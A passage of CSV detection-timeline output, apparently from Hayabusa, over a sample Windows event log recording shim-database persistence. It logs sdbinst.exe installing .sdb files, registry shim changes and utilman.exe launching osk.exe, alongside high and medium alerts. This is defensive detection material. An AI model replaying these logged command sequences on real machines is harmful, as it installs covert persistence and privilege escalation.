365ABB72-55D8-5C91-0000-00108AC80700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3648 | PGUID: 365ABB72-55D8-5C91-0000-001060C90700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.158 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:28.168 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3740 | PGUID: 365ABB72-55D8-5C91-0000-00108AC80700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:31.212 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4024 | PGUID: 365ABB72-55DB-5C91-0000-001094D60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.792 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{bebe1bf6-4a2e-46ad-9266-3fbf73d269a4}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 4052 | PGUID: 365ABB72-55E8-5C91-0000-001037DF0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.802 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.802 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.822 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.832 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.972 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.972 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2668 | PGUID: 365ABB72-55E8-5C91-0000-0010A9E20700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:44.982 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2108 | PGUID: 365ABB72-55E8-5C91-0000-0010AEE50700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.152 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2104 | PGUID: 365ABB72-55E9-5C91-0000-00102EEB0700",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.162 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:45.172 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3956 | PGUID: 365ABB72-55E9-5C91-0000-00105BEA0700,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:49:47.245 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2568 | PGUID: 365ABB72-55EB-5C91-0000-001076F60700,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:51:05.017 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 612 | PGUID: 365ABB72-5638-5C91-0000-0010651A0800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.933 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{7146b11e-ec78-4046-b854-9c9bdc68691e}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 3896 | PGUID: 365ABB72-5689-5C91-0000-0010543F0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.953 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.953 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.973 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:25.983 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.104 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.104 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3848 | PGUID: 365ABB72-5689-5C91-0000-0010A1420800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.114 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 4012 | PGUID: 365ABB72-568A-5C91-0000-0010A6450800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.274 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.364 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 100 | PGUID: 365ABB72-568A-5C91-0000-0010484A0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 4072 | PGUID: 365ABB72-568A-5C91-0000-0010D24B0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:26.364 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:29.138 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 2476 | PGUID: 365ABB72-568D-5C91-0000-001061560800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.124 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{9aadf096-343f-4575-9514-4e5551e5ff19}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2548 | PGUID: 365ABB72-569F-5C91-0000-001012610800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.144 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.144 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.154 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.164 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.294 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3088 | PGUID: 365ABB72-569F-5C91-0000-00105C640800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.334 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3100 | PGUID: 365ABB72-569F-5C91-0000-00105F670800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x33435 | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q -u ""C:\Windows\AppPatch\Test.SDB "" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 3140 | PGUID: 365ABB72-569F-5C91-0000-0010D96C0800",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.474 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:47.484 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\Start Menu\CFP00000000.tmp | Process: C:\Windows\System32\osk.exe | PID: 3132 | PGUID: 365ABB72-569F-5C91-0000-0010036C0800,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:52:50.268 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x33435 | PID: 3312 | PGUID: 365ABB72-56A2-5C91-0000-0010D2770800,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:56:05.149 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x33435 | PID: 3176 | PGUID: 365ABB72-5765-5C91-0000-001039030900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\sdbinst.exe"" -q ""C:\Users\user01\Desktop\titi.sdb"" | Process: C:\Windows\System32\sdbinst.exe | User: EXAMPLE\user01 | Parent Cmd: ""C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe"" | LID: 0x33435 | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:20.994 +09:00,PC01.example.corp,1,high,Persis | PrivEsc,Possible Shim Database Persistence via sdbinst.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_sdbinst_shim_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\AppPatch\Custom\{3ad6ed23-adf8-4bc1-a898-4d695f482c64}.sdb | Process: C:\Windows\system32\sdbinst.exe | PID: 2848 | PGUID: 365ABB72-57EC-5C91-0000-001097810900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:21.014 +09:00,PC01.example.corp,11,medium,Persis,New Shim Database Created in the Default Directory,,../hayabusa-rules/sigma/file_event/win_fe_creation_new_shim_database.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:21.014 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:21.044 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:21.054 +09:00,PC01.example.corp,13,medium,Persis,Registry Key Creation or Modification for Shim DataBase,,../hayabusa-rules/sigma/registry_event/win_re_shim_databases_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:28.214 +09:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 384 | PGUID: 365ABB72-57F4-5C91-0000-0010F0910900,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx 2019-03-20 05:58:28.294 +09:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 